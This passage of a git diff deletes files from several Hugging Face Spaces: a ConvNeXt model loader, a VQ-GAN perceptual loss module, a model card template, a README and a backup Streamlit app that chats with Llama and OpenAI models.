"convnext_base_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_base_22k_224.pth", - "convnext_large_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_large_22k_224.pth", - "convnext_xlarge_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_xlarge_22k_224.pth", -} - -@register_model -def convnext_tiny(pretrained=False,in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 9, 3], dims=[96, 192, 384, 768], **kwargs) - if pretrained: - url = model_urls['convnext_tiny_22k'] if in_22k else model_urls['convnext_tiny_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu", check_hash=True) - model.load_state_dict(checkpoint["model"], strict=False) # we remove classifer head - return model - -@register_model -def convnext_small(pretrained=False,in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[96, 192, 384, 768], **kwargs) - if pretrained: - url = model_urls['convnext_small_22k'] if in_22k else model_urls['convnext_small_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model - -@register_model -def convnext_base(pretrained=False, in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[128, 256, 512, 1024], **kwargs) - if pretrained: - url = model_urls['convnext_base_22k'] if in_22k else model_urls['convnext_base_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model - -@register_model -def convnext_large(pretrained=False, in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[192, 384, 768, 1536], **kwargs) - if pretrained: - url = model_urls['convnext_large_22k'] if in_22k else model_urls['convnext_large_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model - -@register_model -def 
convnext_xlarge(pretrained=False, in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[256, 512, 1024, 2048], **kwargs) - if pretrained: - assert in_22k, "only ImageNet-22K pre-trained ConvNeXt-XL is available; please set in_22k=True" - url = model_urls['convnext_xlarge_22k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model \ No newline at end of file diff --git a/spaces/awaawawawa/iurf7irfuyytruyyugb/ldmlib/modules/losses/vqperceptual.py b/spaces/awaawawawa/iurf7irfuyytruyyugb/ldmlib/modules/losses/vqperceptual.py deleted file mode 100644 index f69981769e4bd5462600458c4fcf26620f7e4306..0000000000000000000000000000000000000000 --- a/spaces/awaawawawa/iurf7irfuyytruyyugb/ldmlib/modules/losses/vqperceptual.py +++ /dev/null @@ -1,167 +0,0 @@ -import torch -from torch import nn -import torch.nn.functional as F -from einops import repeat - -from taming.modules.discriminator.model import NLayerDiscriminator, weights_init -from taming.modules.losses.lpips import LPIPS -from taming.modules.losses.vqperceptual import hinge_d_loss, vanilla_d_loss - - -def hinge_d_loss_with_exemplar_weights(logits_real, logits_fake, weights): - assert weights.shape[0] == logits_real.shape[0] == logits_fake.shape[0] - loss_real = torch.mean(F.relu(1. - logits_real), dim=[1,2,3]) - loss_fake = torch.mean(F.relu(1. + logits_fake), dim=[1,2,3]) - loss_real = (weights * loss_real).sum() / weights.sum() - loss_fake = (weights * loss_fake).sum() / weights.sum() - d_loss = 0.5 * (loss_real + loss_fake) - return d_loss - -def adopt_weight(weight, global_step, threshold=0, value=0.): - if global_step < threshold: - weight = value - return weight - - -def measure_perplexity(predicted_indices, n_embed): - # src: https://github.com/karpathy/deep-vector-quantization/blob/main/model.py - # eval cluster perplexity. 
when perplexity == num_embeddings then all clusters are used exactly equally - encodings = F.one_hot(predicted_indices, n_embed).float().reshape(-1, n_embed) - avg_probs = encodings.mean(0) - perplexity = (-(avg_probs * torch.log(avg_probs + 1e-10)).sum()).exp() - cluster_use = torch.sum(avg_probs > 0) - return perplexity, cluster_use - -def l1(x, y): - return torch.abs(x-y) - - -def l2(x, y): - return torch.pow((x-y), 2) - - -class VQLPIPSWithDiscriminator(nn.Module): - def __init__(self, disc_start, codebook_weight=1.0, pixelloss_weight=1.0, - disc_num_layers=3, disc_in_channels=3, disc_factor=1.0, disc_weight=1.0, - perceptual_weight=1.0, use_actnorm=False, disc_conditional=False, - disc_ndf=64, disc_loss="hinge", n_classes=None, perceptual_loss="lpips", - pixel_loss="l1"): - super().__init__() - assert disc_loss in ["hinge", "vanilla"] - assert perceptual_loss in ["lpips", "clips", "dists"] - assert pixel_loss in ["l1", "l2"] - self.codebook_weight = codebook_weight - self.pixel_weight = pixelloss_weight - if perceptual_loss == "lpips": - print(f"{self.__class__.__name__}: Running with LPIPS.") - self.perceptual_loss = LPIPS().eval() - else: - raise ValueError(f"Unknown perceptual loss: >> {perceptual_loss} <<") - self.perceptual_weight = perceptual_weight - - if pixel_loss == "l1": - self.pixel_loss = l1 - else: - self.pixel_loss = l2 - - self.discriminator = NLayerDiscriminator(input_nc=disc_in_channels, - n_layers=disc_num_layers, - use_actnorm=use_actnorm, - ndf=disc_ndf - ).apply(weights_init) - self.discriminator_iter_start = disc_start - if disc_loss == "hinge": - self.disc_loss = hinge_d_loss - elif disc_loss == "vanilla": - self.disc_loss = vanilla_d_loss - else: - raise ValueError(f"Unknown GAN loss '{disc_loss}'.") - print(f"VQLPIPSWithDiscriminator running with {disc_loss} loss.") - self.disc_factor = disc_factor - self.discriminator_weight = disc_weight - self.disc_conditional = disc_conditional - self.n_classes = n_classes - - def 
calculate_adaptive_weight(self, nll_loss, g_loss, last_layer=None): - if last_layer is not None: - nll_grads = torch.autograd.grad(nll_loss, last_layer, retain_graph=True)[0] - g_grads = torch.autograd.grad(g_loss, last_layer, retain_graph=True)[0] - else: - nll_grads = torch.autograd.grad(nll_loss, self.last_layer[0], retain_graph=True)[0] - g_grads = torch.autograd.grad(g_loss, self.last_layer[0], retain_graph=True)[0] - - d_weight = torch.norm(nll_grads) / (torch.norm(g_grads) + 1e-4) - d_weight = torch.clamp(d_weight, 0.0, 1e4).detach() - d_weight = d_weight * self.discriminator_weight - return d_weight - - def forward(self, codebook_loss, inputs, reconstructions, optimizer_idx, - global_step, last_layer=None, cond=None, split="train", predicted_indices=None): - if codebook_loss is None: # guard against a missing codebook loss (`exists` was undefined here) - codebook_loss = torch.tensor([0.]).to(inputs.device) - #rec_loss = torch.abs(inputs.contiguous() - reconstructions.contiguous()) - rec_loss = self.pixel_loss(inputs.contiguous(), reconstructions.contiguous()) - if self.perceptual_weight > 0: - p_loss = self.perceptual_loss(inputs.contiguous(), reconstructions.contiguous()) - rec_loss = rec_loss + self.perceptual_weight * p_loss - else: - p_loss = torch.tensor([0.0]) - - nll_loss = rec_loss - #nll_loss = torch.sum(nll_loss) / nll_loss.shape[0] - nll_loss = torch.mean(nll_loss) - - # now the GAN part - if optimizer_idx == 0: - # generator update - if cond is None: - assert not self.disc_conditional - logits_fake = self.discriminator(reconstructions.contiguous()) - else: - assert self.disc_conditional - logits_fake = self.discriminator(torch.cat((reconstructions.contiguous(), cond), dim=1)) - g_loss = -torch.mean(logits_fake) - - try: - d_weight = self.calculate_adaptive_weight(nll_loss, g_loss, last_layer=last_layer) - except RuntimeError: - assert not self.training - d_weight = torch.tensor(0.0) - - disc_factor = adopt_weight(self.disc_factor, global_step, threshold=self.discriminator_iter_start) - loss = nll_loss + 
d_weight * disc_factor * g_loss + self.codebook_weight * codebook_loss.mean() - - log = {"{}/total_loss".format(split): loss.clone().detach().mean(), - "{}/quant_loss".format(split): codebook_loss.detach().mean(), - "{}/nll_loss".format(split): nll_loss.detach().mean(), - "{}/rec_loss".format(split): rec_loss.detach().mean(), - "{}/p_loss".format(split): p_loss.detach().mean(), - "{}/d_weight".format(split): d_weight.detach(), - "{}/disc_factor".format(split): torch.tensor(disc_factor), - "{}/g_loss".format(split): g_loss.detach().mean(), - } - if predicted_indices is not None: - assert self.n_classes is not None - with torch.no_grad(): - perplexity, cluster_usage = measure_perplexity(predicted_indices, self.n_classes) - log[f"{split}/perplexity"] = perplexity - log[f"{split}/cluster_usage"] = cluster_usage - return loss, log - - if optimizer_idx == 1: - # second pass for discriminator update - if cond is None: - logits_real = self.discriminator(inputs.contiguous().detach()) - logits_fake = self.discriminator(reconstructions.contiguous().detach()) - else: - logits_real = self.discriminator(torch.cat((inputs.contiguous().detach(), cond), dim=1)) - logits_fake = self.discriminator(torch.cat((reconstructions.contiguous().detach(), cond), dim=1)) - - disc_factor = adopt_weight(self.disc_factor, global_step, threshold=self.discriminator_iter_start) - d_loss = disc_factor * self.disc_loss(logits_real, logits_fake) - - log = {"{}/disc_loss".format(split): d_loss.clone().detach().mean(), - "{}/logits_real".format(split): logits_real.detach().mean(), - "{}/logits_fake".format(split): logits_fake.detach().mean() - } - return d_loss, log diff --git a/spaces/awacke1/CardWriterPro/current_card.md b/spaces/awacke1/CardWriterPro/current_card.md deleted file mode 100644 index ec8fe14efadc5cca91c2dfb3833e2f0e54e124d3..0000000000000000000000000000000000000000 --- a/spaces/awacke1/CardWriterPro/current_card.md +++ /dev/null @@ -1,222 +0,0 @@ ---- -{{card_data}} ---- - -# {{ model_id 
}} - - Provide a quick summary of what the model is/does. - -# Table of Contents - -- [{{ model_id }}](#-model_id-) -- [Table of Contents](#table-of-contents) -- [Model Details](#model-details) - - [Model Description](#model-description) -- [Uses](#uses) - - [Direct Use](#direct-use) - - [Downstream Use [Optional]](#downstream-use-optional) - - [Out-of-Scope Use](#out-of-scope-use) -- [Bias, Risks, and Limitations](#bias-risks-and-limitations) - - [Recommendations](#recommendations) -- [Training Details](#training-details) - - [Training Data](#training-data) - - [Training Procedure](#training-procedure) - - [Preprocessing](#preprocessing) - - [Speeds, Sizes, Times](#speeds-sizes-times) -- [Evaluation](#evaluation) - - [Testing Data, Factors & Metrics](#testing-data-factors--metrics) - - [Testing Data](#testing-data) - - [Factors](#factors) - - [Metrics](#metrics) - - [Results](#results) -- [Model Examination](#model-examination) -- [Environmental Impact](#environmental-impact) -- [Technical Specifications [optional]](#technical-specifications-optional) - - [Model Architecture and Objective](#model-architecture-and-objective) - - [Compute Infrastructure](#compute-infrastructure) - - [Hardware](#hardware) - - [Software](#software) -- [Citation](#citation) -- [Glossary [optional]](#glossary-optional) -- [More Information [optional]](#more-information-optional) -- [Model Card Authors [optional]](#model-card-authors-optional) -- [Model Card Contact](#model-card-contact) -- [How to Get Started with the Model](#how-to-get-started-with-the-model) - - -# Model Details - -## Model Description - - This section provides basic information about what the model is, its current status, and where it came from.. 
-{{ the_model_description | default("More information needed", true)}} - -- **Developed by:** {{ developers | default("More information needed", true)}} -- **Shared by [Optional]:** {{ shared_by | default("More information needed", true)}} -- **Model type:** Language model -- **Language(s) (NLP):** {{ language | default("More information needed", true)}} -- **License:** {{ license | default("More information needed", true)}} -- **Related Models:** {{ related_models | default("More information needed", true)}} - - **Parent Model:** {{ parent_model | default("More information needed", true)}} -- **Resources for more information:** {{ more_resources | default("More information needed", true)}} - -# Uses - - Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. - -## Direct Use - - This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. - -{{ direct_use | default("More information needed", true)}} - -## Downstream Use [Optional] - - This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app - -{{ downstream_use | default("More information needed", true)}} - -## Out-of-Scope Use - - This section addresses misuse, malicious use, and uses that the model will not work well for. - -{{ out_of_scope_use | default("More information needed", true)}} - -# Bias, Risks, and Limitations - - This section is meant to convey both technical and sociotechnical limitations. - -{{ bias_risks_limitations | default("More information needed", true)}} - -## Recommendations - - This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. - -{{ bias_recommendations | default("Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. 
More information needed for further recommendations.", true)}} - -# Training Details - -## Training Data - - This should link to a Data Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. - -{{ training_data | default("More information needed", true)}} - -## Training Procedure - - This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. - -### Preprocessing - -{{ preprocessing | default("More information needed", true)}} - -### Speeds, Sizes, Times - - This section provides information about throughput, start/end time, checkpoint size if relevant, etc. - -{{ speeds_sizes_times | default("More information needed", true)}} - -# Evaluation - - This section describes the evaluation protocols and provides the results. - -## Testing Data, Factors & Metrics - -### Testing Data - - This should link to a Data Card if possible. - -{{ testing_data | default("More information needed", true)}} - -### Factors - - These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. - -{{ testing_factors | default("More information needed", true)}} - -### Metrics - - These are the evaluation metrics being used, ideally with a description of why. - -{{ testing_metrics | default("More information needed", true)}} - -## Results - -{{ results | default("More information needed", true)}} - -# Model Examination - -{{ model_examination | default("More information needed", true)}} - -# Environmental Impact - - Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly. - -Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). 
- -- **Hardware Type:** {{ hardware | default("More information needed", true)}} -- **Hours used:** {{ hours_used | default("More information needed", true)}} -- **Cloud Provider:** {{ cloud_provider | default("More information needed", true)}} -- **Compute Region:** {{ cloud_region | default("More information needed", true)}} -- **Carbon Emitted:** {{ co2_emitted | default("More information needed", true)}} - -# Technical Specifications [optional] - -## Model Architecture and Objective - -{{ model_specs | default("More information needed", true)}} - -## Compute Infrastructure - -{{ compute_infrastructure | default("More information needed", true)}} - -### Hardware - -{{ hardware | default("More information needed", true)}} - -### Software - -{{ software | default("More information needed", true)}} - -# Citation - - If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. - -**BibTeX:** - -{{ citation_bibtex | default("More information needed", true)}} - -**APA:** - -{{ citation_apa | default("More information needed", true)}} - -# Glossary [optional] - - If relevant, include terms and calculations in this section that can help readers understand the model or model card. - -{{ glossary | default("More information needed", true)}} - -# More Information [optional] - -{{ more_information | default("More information needed", true)}} - -# Model Card Authors [optional] - -{{ model_card_authors | default("More information needed", true)}} - -# Model Card Contact - -{{ model_card_contact | default("More information needed", true)}} - -# How to Get Started with the Model - -Use the code below to get started with the model. - -
-<details>
-<summary> Click to expand </summary>
-
-{{ get_started_code | default("More information needed", true)}}
-
-</details>
    - - diff --git a/spaces/awacke1/HealthConditionsTest/README.md b/spaces/awacke1/HealthConditionsTest/README.md deleted file mode 100644 index 87ae0d8c42f035539958276592bfeeeb449612c6..0000000000000000000000000000000000000000 --- a/spaces/awacke1/HealthConditionsTest/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: 👀HealthConditionsTest -emoji: 👀HC👀 -colorFrom: purple -colorTo: pink -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/awacke1/mixture-of-experts-dr-llama/backupapp.py b/spaces/awacke1/mixture-of-experts-dr-llama/backupapp.py deleted file mode 100644 index 413ce04e1cbd0f1a5980b82775afe2791422f4e8..0000000000000000000000000000000000000000 --- a/spaces/awacke1/mixture-of-experts-dr-llama/backupapp.py +++ /dev/null @@ -1,728 +0,0 @@ -# Imports -import base64 -import glob -import json -import math -import openai -import os -import pytz -import re -import requests -import streamlit as st -import textract -import time -import zipfile -import huggingface_hub -import dotenv -from audio_recorder_streamlit import audio_recorder -from bs4 import BeautifulSoup -from collections import deque -from datetime import datetime -from dotenv import load_dotenv -from huggingface_hub import InferenceClient -from io import BytesIO -from langchain.chat_models import ChatOpenAI -from langchain.chains import ConversationalRetrievalChain -from langchain.embeddings import OpenAIEmbeddings -from langchain.memory import ConversationBufferMemory -from langchain.text_splitter import CharacterTextSplitter -from langchain.vectorstores import FAISS -from openai import ChatCompletion -from PyPDF2 import PdfReader -from templates import bot_template, css, user_template -from xml.etree import ElementTree as ET -import streamlit.components.v1 as components # Import Streamlit Components for HTML5 - - 
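The backup app below reads several API keys from environment variables loaded via `dotenv`. A minimal sketch of that configuration step; the variable names mirror those the app reads, but the missing-key handling here is illustrative, not the app's exact logic:

```python
import os

# Collect the expected keys from an environment mapping, flagging any that
# are missing. API_KEY, HF_KEY, and OPENAI_API_KEY are the names the app
# uses; the fallback behaviour is an assumption for illustration.

def load_keys(env=None):
    """Return (keys, missing) for the environment variables the app expects."""
    env = os.environ if env is None else env
    names = ('API_KEY', 'HF_KEY', 'OPENAI_API_KEY')
    keys = {name: env.get(name) for name in names}
    missing = [name for name, value in keys.items() if not value]
    return keys, missing

keys, missing = load_keys({'HF_KEY': 'hf_example_token'})
print(missing)  # -> ['API_KEY', 'OPENAI_API_KEY']
```

Checking for missing keys up front gives a clearer failure than the `None` tokens surfacing later inside an HTTP request.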
-st.set_page_config(page_title="🐪Llama Whisperer🦙 Voice Chat🌟", layout="wide") - - -def add_Med_Licensing_Exam_Dataset(): - import streamlit as st - from datasets import load_dataset - dataset = load_dataset("augtoma/usmle_step_1")['test'] # Using 'test' split - st.title("USMLE Step 1 Dataset Viewer") - if len(dataset) == 0: - st.write("😢 The dataset is empty.") - else: - st.write(""" - 🔍 Use the search box to filter questions or use the grid to scroll through the dataset. - """) - - # 👩‍🔬 Search Box - search_term = st.text_input("Search for a specific question:", "") - - # 🎛 Pagination - records_per_page = 100 - num_records = len(dataset) - num_pages = max(int(num_records / records_per_page), 1) - - # Skip generating the slider if num_pages is 1 (i.e., all records fit in one page) - if num_pages > 1: - page_number = st.select_slider("Select page:", options=list(range(1, num_pages + 1))) - else: - page_number = 1 # Only one page - - # 📊 Display Data - start_idx = (page_number - 1) * records_per_page - end_idx = start_idx + records_per_page - - # 🧪 Apply the Search Filter - filtered_data = [] - for record in dataset[start_idx:end_idx]: - if isinstance(record, dict) and 'text' in record and 'id' in record: - if search_term: - if search_term.lower() in record['text'].lower(): - filtered_data.append(record) - else: - filtered_data.append(record) - - # 🌐 Render the Grid - for record in filtered_data: - st.write(f"## Question ID: {record['id']}") - st.write(f"### Question:") - st.write(f"{record['text']}") - st.write(f"### Answer:") - st.write(f"{record['answer']}") - st.write("---") - - st.write(f"😊 Total Records: {num_records} | 📄 Displaying {start_idx+1} to {min(end_idx, num_records)}") - -# 1. 
Constants and Top Level UI Variables - -# My Inference API Copy -# API_URL = 'https://qe55p8afio98s0u3.us-east-1.aws.endpoints.huggingface.cloud' # Dr Llama -# Original: -API_URL = "https://api-inference.huggingface.co/models/meta-llama/Llama-2-7b-chat-hf" -API_KEY = os.getenv('API_KEY') -MODEL1="meta-llama/Llama-2-7b-chat-hf" -MODEL1URL="https://huggingface.co/meta-llama/Llama-2-7b-chat-hf" -HF_KEY = os.getenv('HF_KEY') -headers = { - "Authorization": f"Bearer {HF_KEY}", - "Content-Type": "application/json" -} -key = os.getenv('OPENAI_API_KEY') -prompt = f"Write instructions to teach anyone to write a discharge plan. List the entities, features and relationships to CCDA and FHIR objects in boldface." -should_save = st.sidebar.checkbox("💾 Save", value=True, help="Save your session data.") - -# 2. Prompt label button demo for LLM -def add_witty_humor_buttons(): - with st.expander("Wit and Humor 🤣", expanded=True): - # Tip about the Dromedary family - st.markdown("🔬 **Fun Fact**: Dromedaries, part of the camel family, have a single hump and are adapted to arid environments. 
Their 'superpowers' include the ability to survive without water for up to 7 days, thanks to their specialized blood cells and water storage in their hump.") - - # Define button descriptions - descriptions = { - "Generate Limericks 😂": "Write ten random adult limericks based on quotes that are tweet length and make you laugh 🎭", - "Wise Quotes 🧙": "Generate ten wise quotes that are tweet length 🦉", - "Funny Rhymes 🎤": "Create ten funny rhymes that are tweet length 🎶", - "Medical Jokes 💉": "Create ten medical jokes that are tweet length 🏥", - "Minnesota Humor ❄️": "Create ten jokes about Minnesota that are tweet length 🌨️", - "Top Funny Stories 📖": "Create ten funny stories that are tweet length 📚", - "More Funny Rhymes 🎙️": "Create ten more funny rhymes that are tweet length 🎵" - } - - # Create columns - col1, col2, col3 = st.columns([1, 1, 1], gap="small") - - # Add buttons to columns - if col1.button("Generate Limericks 😂"): - StreamLLMChatResponse(descriptions["Generate Limericks 😂"]) - - if col2.button("Wise Quotes 🧙"): - StreamLLMChatResponse(descriptions["Wise Quotes 🧙"]) - - if col3.button("Funny Rhymes 🎤"): - StreamLLMChatResponse(descriptions["Funny Rhymes 🎤"]) - - col4, col5, col6 = st.columns([1, 1, 1], gap="small") - - if col4.button("Medical Jokes 💉"): - StreamLLMChatResponse(descriptions["Medical Jokes 💉"]) - - if col5.button("Minnesota Humor ❄️"): - StreamLLMChatResponse(descriptions["Minnesota Humor ❄️"]) - - if col6.button("Top Funny Stories 📖"): - StreamLLMChatResponse(descriptions["Top Funny Stories 📖"]) - - col7 = st.columns(1, gap="small") - - if col7[0].button("More Funny Rhymes 🎙️"): - StreamLLMChatResponse(descriptions["More Funny Rhymes 🎙️"]) - -def SpeechSynthesis(result): - documentHTML5=''' - - - - Read It Aloud - - - -

-    <script type="text/javascript">
-        function readAloud() {
-            const text = document.getElementById("textArea").value;
-            const speech = new SpeechSynthesisUtterance(text);
-            window.speechSynthesis.speak(speech);
-        }
-    </script>
-    <h1>🔊 Read It Aloud</h1>
-    <textarea id="textArea" rows="10" cols="80">''' + result + '''</textarea>
-    <br>
-    <button onclick="readAloud()">🔊 Read Aloud</button>
    - - - - ''' - - components.html(documentHTML5, width=1280, height=1024) - #return result - - -# 3. Stream Llama Response -# @st.cache_resource -def StreamLLMChatResponse(prompt): - try: - endpoint_url = API_URL - hf_token = API_KEY - client = InferenceClient(endpoint_url, token=hf_token) - gen_kwargs = dict( - max_new_tokens=512, - top_k=30, - top_p=0.9, - temperature=0.2, - repetition_penalty=1.02, - stop_sequences=["\nUser:", "<|endoftext|>", ""], - ) - stream = client.text_generation(prompt, stream=True, details=True, **gen_kwargs) - report=[] - res_box = st.empty() - collected_chunks=[] - collected_messages=[] - allresults='' - for r in stream: - if r.token.special: - continue - if r.token.text in gen_kwargs["stop_sequences"]: - break - collected_chunks.append(r.token.text) - chunk_message = r.token.text - collected_messages.append(chunk_message) - try: - report.append(r.token.text) - if len(r.token.text) > 0: - result="".join(report).strip() - res_box.markdown(f'*{result}*') - - except: - st.write('Stream llm issue') - SpeechSynthesis(result) - return result - except: - st.write('Llama model is asleep. Starting up now on A10 - please give 5 minutes then retry as KEDA scales up from zero to activate running container(s).') - -# 4. Run query with payload -def query(payload): - response = requests.post(API_URL, headers=headers, json=payload) - st.markdown(response.json()) - return response.json() -def get_output(prompt): - return query({"inputs": prompt}) - -# 5. Auto name generated output files from time and content -def generate_filename(prompt, file_type): - central = pytz.timezone('US/Central') - safe_date_time = datetime.now(central).strftime("%m%d_%H%M") - replaced_prompt = prompt.replace(" ", "_").replace("\n", "_") - safe_prompt = "".join(x for x in replaced_prompt if x.isalnum() or x == "_")[:45] - return f"{safe_date_time}_{safe_prompt}.{file_type}" - -# 6. 
Speech transcription via OpenAI service -def transcribe_audio(openai_key, file_path, model): - openai.api_key = openai_key - OPENAI_API_URL = "https://api.openai.com/v1/audio/transcriptions" - headers = { - "Authorization": f"Bearer {openai_key}", - } - with open(file_path, 'rb') as f: - data = {'file': f} - response = requests.post(OPENAI_API_URL, headers=headers, files=data, data={'model': model}) - if response.status_code == 200: - st.write(response.json()) - chatResponse = chat_with_model(response.json().get('text'), '') # ************************************* - transcript = response.json().get('text') - filename = generate_filename(transcript, 'txt') - response = chatResponse - user_prompt = transcript - create_file(filename, user_prompt, response, should_save) - return transcript - else: - st.write(response.json()) - st.error("Error in API call.") - return None - -# 7. Auto stop on silence audio control for recording WAV files -def save_and_play_audio(audio_recorder): - audio_bytes = audio_recorder(key='audio_recorder') - if audio_bytes: - filename = generate_filename("Recording", "wav") - with open(filename, 'wb') as f: - f.write(audio_bytes) - st.audio(audio_bytes, format="audio/wav") - return filename - return None - -# 8. 
File creator that interprets type and creates output file for text, markdown and code -def create_file(filename, prompt, response, should_save=True): - if not should_save: - return - base_filename, ext = os.path.splitext(filename) - if ext in ['.txt', '.htm', '.md']: - with open(f"{base_filename}.md", 'w') as file: - try: - content = prompt.strip() + '\r\n' + response - file.write(content) - except: - st.write('.') - - #has_python_code = re.search(r"```python([\s\S]*?)```", prompt.strip() + '\r\n' + response) - #has_python_code = bool(re.search(r"```python([\s\S]*?)```", prompt.strip() + '\r\n' + response)) - #if has_python_code: - # python_code = re.findall(r"```python([\s\S]*?)```", response)[0].strip() - # with open(f"{base_filename}-Code.py", 'w') as file: - # file.write(python_code) - # with open(f"{base_filename}.md", 'w') as file: - # content = prompt.strip() + '\r\n' + response - # file.write(content) - -def truncate_document(document, length): - return document[:length] -def divide_document(document, max_length): - return [document[i:i+max_length] for i in range(0, len(document), max_length)] - -# 9. 
Sidebar with UI controls to review and re-run prompts and continue responses -@st.cache_resource -def get_table_download_link(file_path): - with open(file_path, 'r') as file: - data = file.read() - - b64 = base64.b64encode(data.encode()).decode() - file_name = os.path.basename(file_path) - ext = os.path.splitext(file_name)[1] # get the file extension - if ext == '.txt': - mime_type = 'text/plain' - elif ext == '.py': - mime_type = 'text/plain' - elif ext == '.xlsx': - mime_type = 'text/plain' - elif ext == '.csv': - mime_type = 'text/plain' - elif ext == '.htm': - mime_type = 'text/html' - elif ext == '.md': - mime_type = 'text/markdown' - else: - mime_type = 'application/octet-stream' # general binary data type - href = f'<a href="data:{mime_type};base64,{b64}" download="{file_name}">{file_name}</a>' # data-URI link; b64 payload was otherwise unused - return href - - -def CompressXML(xml_text): - root = ET.fromstring(xml_text) - parent_map = {child: parent for parent in root.iter() for child in parent} # ElementTree elements have no .parent attribute - for elem in list(root.iter()): - if isinstance(elem.tag, str) and 'Comment' in elem.tag and elem in parent_map: - parent_map[elem].remove(elem) - return ET.tostring(root, encoding='unicode', method="xml") - -# 10. Read in and provide UI for past files -@st.cache_resource -def read_file_content(file,max_length): - if file.type == "application/json": - content = json.load(file) - return str(content) - elif file.type == "text/html" or file.type == "text/htm": - content = BeautifulSoup(file, "html.parser") - return content.text - elif file.type == "application/xml" or file.type == "text/xml": - tree = ET.parse(file) - root = tree.getroot() - xml = CompressXML(ET.tostring(root, encoding='unicode')) - return xml - elif file.type == "text/markdown" or file.type == "text/md": - md = mistune.create_markdown() - content = md(file.read().decode()) - return content - elif file.type == "text/plain": - return file.getvalue().decode() - else: - return "" - -# 11. 
Chat with GPT - Caution on quota - now favoring fastest AI pipeline STT Whisper->LLM Llama->TTS -@st.cache_resource -def chat_with_model(prompt, document_section, model_choice='gpt-3.5-turbo'): - model = model_choice - conversation = [{'role': 'system', 'content': 'You are a helpful assistant.'}] - conversation.append({'role': 'user', 'content': prompt}) - if len(document_section)>0: - conversation.append({'role': 'assistant', 'content': document_section}) - start_time = time.time() - report = [] - res_box = st.empty() - collected_chunks = [] - collected_messages = [] - for chunk in openai.ChatCompletion.create(model=model, messages=conversation, temperature=0.5, stream=True): # honor model_choice instead of hardcoding the model - collected_chunks.append(chunk) - chunk_message = chunk['choices'][0]['delta'] - collected_messages.append(chunk_message) - content=chunk["choices"][0].get("delta",{}).get("content") - try: - if content: # streamed deltas may carry no content (e.g. role-only chunks) - report.append(content) - result = "".join(report).strip() - res_box.markdown(f'*{result}*') - except: - st.write(' ') - full_reply_content = ''.join([m.get('content', '') for m in collected_messages]) - st.write("Elapsed time:") - st.write(time.time() - start_time) - return full_reply_content - -# 12. 
Embedding VectorDB for LLM query of documents to text to compress inputs and prompt together as Chat memory using Langchain -@st.cache_resource -def chat_with_file_contents(prompt, file_content, model_choice='gpt-3.5-turbo'): - conversation = [{'role': 'system', 'content': 'You are a helpful assistant.'}] - conversation.append({'role': 'user', 'content': prompt}) - if len(file_content)>0: - conversation.append({'role': 'assistant', 'content': file_content}) - response = openai.ChatCompletion.create(model=model_choice, messages=conversation) - return response['choices'][0]['message']['content'] - -def extract_mime_type(file): - if isinstance(file, str): - pattern = r"type='(.*?)'" - match = re.search(pattern, file) - if match: - return match.group(1) - else: - raise ValueError(f"Unable to extract MIME type from {file}") - elif isinstance(file, streamlit.UploadedFile): - return file.type - else: - raise TypeError("Input should be a string or a streamlit.UploadedFile object") - -def extract_file_extension(file): - # get the file name directly from the UploadedFile object - file_name = file.name - pattern = r".*?\.(.*?)$" - match = re.search(pattern, file_name) - if match: - return match.group(1) - else: - raise ValueError(f"Unable to extract file extension from {file_name}") - -# Normalize input as text from PDF and other formats -@st.cache_resource -def pdf2txt(docs): - text = "" - for file in docs: - file_extension = extract_file_extension(file) - st.write(f"File type extension: {file_extension}") - if file_extension.lower() in ['py', 'txt', 'html', 'htm', 'xml', 'json']: - text += file.getvalue().decode('utf-8') - elif file_extension.lower() == 'pdf': - from PyPDF2 import PdfReader - pdf = PdfReader(BytesIO(file.getvalue())) - for page in range(len(pdf.pages)): - text += pdf.pages[page].extract_text() # new PyPDF2 syntax - return text - -def txt2chunks(text): - text_splitter = CharacterTextSplitter(separator="\n", chunk_size=1000, chunk_overlap=200, 
